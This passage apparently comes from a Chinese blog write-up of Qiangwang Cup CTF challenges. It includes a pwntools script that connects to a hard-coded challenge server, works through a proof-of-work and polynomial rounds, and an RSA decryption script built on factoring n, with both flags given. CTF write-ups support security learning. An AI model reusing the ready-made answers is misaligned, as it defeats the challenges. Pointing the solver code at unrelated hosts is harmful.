# print(head) return head.encode() io = remote('47.94.166.51', 24228) io.recvuntil(b"sha256") t = io.recvuntil(b"\n")[:-1].decode() tail = t[6:22] HASH = t[-64:] """ print(t) print(tail) print(HASH) """ io.recvuntil(b'Give me XXXX: ') io.send(proof()) for k in tqdm(range(40)): io.recvuntil(b"r(x) = ") pr = io.recvuntil(b"\n")[:-1].decode() io.recvuntil(b"a(x) = ") pa = io.recvuntil(b"\n")[:-1].decode() io.recvuntil(b"c(x) = ") pc = io.recvuntil(b"\n")[:-1].decode() io.recvuntil(b"b(x) = ") b = str(cal_b([pr, pa, pc])).encode() io.send(b) io.interactive()- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
- 89
- 90
- 91
- 92
- 93
- 94
- 95
- 96
- 97
- 98
- 99
- 100
- 101
- 102
- 103
- 104
- 105
- 106
- 107
- 108
- 109
- 110
- 111
- 112
- 113
- 114
- 115
- 116
- 117
- 118
- 119
- 120
- 121
- 122
- 123
- 124
- 125
- 126
- 127
- 128
- 129
- 130
- 131
- 132
- 133
- 134
- 135
- 136
- 137
- 138
- 139
- 140
- 141
- 142
- 143
- 144
- 145
- 146
- 147
- 148
- 149
- 150
- 151
- 152
- 153
- 154
- 155
- 156
- 157
- 158
- 159
- 160
- 161
- 162
- 163
- 164
- 165
- 166
- 167
- 168
- 169
- 170
- 171
- 172
- 173
- 174
- 175
- 176
- 177
- 178
- 179
- 180
- 181
- 182
- 183
- 184
- 185
- 186
- 187
- 188
- 189
- 190
- 191
- 192
- 193
- 194
- 195
- 196
- 197
- 198
- 199
- 200
- 201
- 202
- 203
flag{2181947d-377c-445c-bcab-579e70ba3911}【强网先锋】ASR
1、这道题的关键是n的分解
题目附件给出:
所以,n=qqpprrss
那么就有√n=qprs2、接下去利用yafu分解n,这一步时间花费较多,最后得出p、q、r、s
p = 260594583349478633632570848336184053653
q = 223213222467584072959434495118689164399
r = 218566259296037866647273372633238739089
s = 2259339446085583045291794307531708133473、RSA解密
上面解出来的pqrs中发现r-1和s-1能被e=3整除
所以就有c=m^e%(ppqq)from Crypto.Util.number import getPrime, long_to_bytes from gmpy2 import * n = 8250871280281573979365095715711359115372504458973444367083195431861307534563246537364248104106494598081988216584432003199198805753721448450911308558041115465900179230798939615583517756265557814710419157462721793864532239042758808298575522666358352726060578194045804198551989679722201244547561044646931280001 n1 = 2872432989693854281918578458293603200587306199407874717707522587993136874097838265650829958344702997782980206004276973399784460125581362617464018665640001 e = 3 c = 945272793717722090962030960824180726576357481511799904903841312265308706852971155205003971821843069272938250385935597609059700446530436381124650731751982419593070224310399320617914955227288662661442416421725698368791013785074809691867988444306279231013360024747585261790352627234450209996422862329513284149 p = 260594583349478633632570848336184053653 q = 223213222467584072959434495118689164399 r = 218566259296037866647273372633238739089 s = 225933944608558304529179430753170813347 phi = (p-1)*(q-1)*(r-1)*(s-1)*p*q*r*s phi = (p-1)*(q-1)*p*q t = gcd(e, phi) print(t) d = invert(e,phi) m = pow(c,d,p*p*q*q) print(m) print(long_to_bytes(m))- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
flag{Fear_can_hold_you_prisoner_Hope_can_set_you_free} -
相关阅读:
【Java 数据结构】双向链表
手机成绩分析软件排行榜TOP10下载
SpringMVC初次尝试
自编efi文件测试vmware虚拟机如何进入UEFI环境
HTTP身份认证
python 综合练习
GitHub最新发布,阿里十年架构师手写版spring全家桶笔记全新开源
Android 设计模式-外观模式
后端研发工程师面经——计算机网络
JAVA【DAO及其实现类】
- 原文地址:https://blog.csdn.net/ZXW_NUDT/article/details/126095713
